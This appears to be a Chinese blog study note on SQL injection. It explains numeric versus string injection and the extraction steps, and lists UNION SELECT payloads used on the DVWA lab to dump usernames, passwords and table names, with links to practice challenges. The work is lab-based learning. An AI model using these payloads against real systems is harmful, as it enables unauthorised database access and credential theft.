SQL注入

SQL注入

类型
1.数字型注入
2.字符型注入
区别:字符型注入需要闭合单引号“ ’ ”,数字型不需要
SQL注入基本步骤

1)判断是否存在注入,注人是字符型还是数字型。
2)猜解SQL查询语句中的字段数及字段顺序。
3)获取当前数据库名。
4)获取数据库中的表名。
5)获取表中的字段名。
6)下载数据。

DVWA

low安全级别

  • 获取user及password
    'union select user,password from users
  • 尝试获取数据库名
    'union select user(),database()
  • 尝试获取数据库表名
    'union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #
  • 猜测密码和用户名字段
    union select, pwd from admin(假如上一步返回表明为admin)(若无回显,则更改pwd,重新猜测密码字段)
    经查看低安全的服务器端代码可以发现->
    程序对来自客户端的参数id没有进行任何检查和过滤

靶场 buu

buu
BUU SQL COURSE 1
https://blog.csdn.net/CyhDl666/article/details/114688676
[SUCTF 2019]EasySQL 1

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值